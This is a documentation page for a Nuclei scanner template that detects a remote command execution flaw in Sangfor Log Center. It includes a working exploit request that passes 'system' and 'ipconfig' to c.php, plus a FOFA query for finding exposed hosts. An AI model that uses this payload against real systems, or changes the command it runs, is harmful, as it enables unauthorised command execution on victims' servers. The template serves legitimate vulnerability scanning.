Sangfor Log Center - Remote Command Execution
ID: sangfor-cphp-rce
Severity: critical
Author: DhiyaneshDk
Tags: sangfor,rce
Description
Section titled “Description”Sangfor Log Center is vulnerable to RCE.
YAML Source
Section titled “YAML Source”id: sangfor-cphp-rce
info: name: Sangfor Log Center - Remote Command Execution author: DhiyaneshDk severity: critical description: Sangfor Log Center is vulnerable to RCE. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E6%97%A5%E5%BF%97%E4%B8%AD%E5%BF%83%20c.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?plain=1 metadata: verified: true max-request: 1 fofa-query: "isHighPerformance : !!SFIsHighPerformance" tags: sangfor,rce
http: - method: GET path: - "{{BaseURL}}/tool/log/c.php?strip_slashes=system&host=ipconfig"
matchers-condition: and matchers: - type: word part: body words: - "Windows IP" - "Log Helper" condition: and
- type: status status: - 200# digest: 4a0a00473045022100b6a581c91f3c55d91f85576f0bed4b9417144c23cc9a2c979c884ce562c00a2302200b6743e8f1fbb583f2908ec244f01fa78fc4debe5f59827e82929de429fee0a4:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/sangfor-cphp-rce.yaml"